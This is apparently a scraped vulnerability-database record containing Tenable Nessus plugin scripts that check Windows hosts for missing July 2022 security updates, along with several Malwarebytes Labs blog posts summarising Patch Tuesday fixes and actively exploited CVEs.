script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015807. 
It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015807\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015807\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015807\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015807'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvar os_name = get_kb_item(\"SMB/ProductName\");\n\nif 
(\n ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807]) \n )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:32", "description": "The remote Windows host is missing security update 5015827. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-22024, CVE-2022-22027, CVE-2022-22038, CVE-2022-30211, CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015827: Windows Server 2022 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-23816", "CVE-2022-23825", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015827.NASL", "href": "https://www.tenable.com/plugins/nessus/163045", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163045);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n 
\"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-23816\",\n \"CVE-2022-23825\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015827\");\n script_xref(name:\"MSFT\", value:\"MS22-5015827\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015827: Windows Server 2022 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015827. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30220, CVE-2022-30224, CVE-2022-30225,\n CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22038, CVE-2022-30211,\n CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015827\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015827\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015827\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015827'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015827])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-07-16T16:17:19", "description": "It\u2019s time to triage a lot of [patching](<https://www.malwarebytes.com/business/vulnerability-patch-management>) again. 
Microsoft\u2019s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) [list of vulnerabilities known to be exploited in the wild](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) that are due for patching by August 2, 2022.\n\n## Microsoft\n\nIn total, the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as \u201cCritical\u201d since they are remote code execution (RCE) vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that were assigned to the four Critical vulnerabilities:\n\n[CVE-2022-22029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22029>): Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n[CVE-2022-22039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22039>): Another Windows Network File System (NFS) RCE vulnerability. It's possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.\n\n[CVE-2022-22038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22038>): Remote Procedure Call Runtime RCE vulnerability. 
Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[CVE-2022-30221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30221>): Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n## Azure Site Recovery\n\nA huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/>) is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.\n\nAccording to Microsoft, [SQL injection](<https://www.malwarebytes.com/glossary/sql-injection>) vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.\n\n## CVE-2022-22047\n\nThe vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nThe vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. 
CSRSS is critical for a system\u2019s operation and is mainly responsible for Win32 console handling and GUI shutdown.\n\nThis type of vulnerability is often chained together with others in macros, which makes the decision to [roll back Office Macro blocking](<https://blog.malwarebytes.com/business/2022/07/microsoft-appears-to-be-rolling-back-office-macro-blocking/>) incomprehensible, even if it is only temporary.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are a few major ones that you may find in your environment.\n\nAdobe released [security updates](<https://helpx.adobe.com/security.html>) for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.\n\nCisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and [several other security updates](<https://tools.cisco.com/security/center/publicationListing.x>).\n\nCitrix released [hotfixes](<https://support.citrix.com/article/CTX461397/citrix-hypervisor-security-bulletin-for-cve202223816-and-cve202223825>) to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.\n\nGoogle released [Android's July security updates](<https://source.android.com/security/bulletin/2022-07-01>) including 3 labelled as \u201cCritical\u201d.\n\nSAP released its [July 2022 Patch Day bulletin](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) with 20 new Security Notes.\n\nVMware released [security updates](<https://www.vmware.com/security/advisories.html>).\n\nStay safe, everyone!\n\nThe post [Update now\u2014July Patch Tuesday patches include fix for exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/>) appeared first on 
[Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T12:21:53", "type": "malwarebytes", "title": "Update now\u2014July Patch Tuesday patches include fix for exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-30221"], "modified": "2022-07-13T12:21:53", "id": "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:16", "description": "This patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates, two of them are actively being used in the wild by a group called PuzzleMaker, four others that have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. 
Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 & KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege 
Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that "could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process", which is as bad as it sounds. 
That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it's patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-27602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. 
An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * [CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably, five critical vulnerabilities in Adobe Acrobat and Reader were fixed. Acrobat's determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services), which is why we try to link you to the MITRE list of CVEs where possible. 
It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T14:38:54", "description": "The sheer number of patches (44 security vulnerabilities) should be enough to scare us, but unfortunately we have gotten used to those numbers. In fact, 44 is a low number compared to what we have seen on recent Patch Tuesdays. So what are the most notable vulnerabilities that were patched?\n\n * One actively exploited vulnerability\n * One vulnerability that has a CVSS score of 9.9 out of 10\n * And yet another attempt to fix PrintNightmare\n\nLet\u2019s go over these worst cases to get an idea of what we are up against.\n\n### CVEs\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n### Actively exploited\n\n[CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) is an [elevation of privilege (EoP)](<https://blog.malwarebytes.com/glossary/privilege-escalation/>) vulnerability in the Windows Update Medic Service. The Windows Update Medic Service is a background service that was introduced with Windows 10 and handles the updating process. Its only purpose is to repair the Windows Update service so that your PC can continue to receive updates unhindered. Besides Windows 10, it also runs on Windows Server 2019. According to Microsoft, CVE-2021-36948 is being actively exploited, but the company is not aware of publicly available exploit code. 
